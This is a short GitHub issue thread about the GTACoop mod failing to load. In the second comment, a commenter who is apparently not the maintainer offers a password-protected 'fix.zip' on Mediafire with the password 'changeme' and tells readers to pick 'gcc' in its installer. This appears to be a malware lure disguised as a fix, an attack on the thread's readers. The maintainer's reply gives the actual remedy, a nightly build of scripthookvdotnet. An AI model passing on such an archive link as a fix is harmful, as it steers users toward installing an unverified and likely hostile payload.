### ISSUE TITLE
Mod Is Not Loading

### ISSUE THREAD

**Issue by LKGHuncho214** [oldnapalm/GTACoop#12]
Ive updated using the current scripthookv, and everything. the client wont spawn, Using the current game version With the regular scripthookv.net and everything.

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by oldnapalm** [comment]
For game version 1.0.3258 or later you need to use scripthookvdotnet nightly build

https://github.com/scripthookvdotnet/scripthookvdotnet-nightly/releases
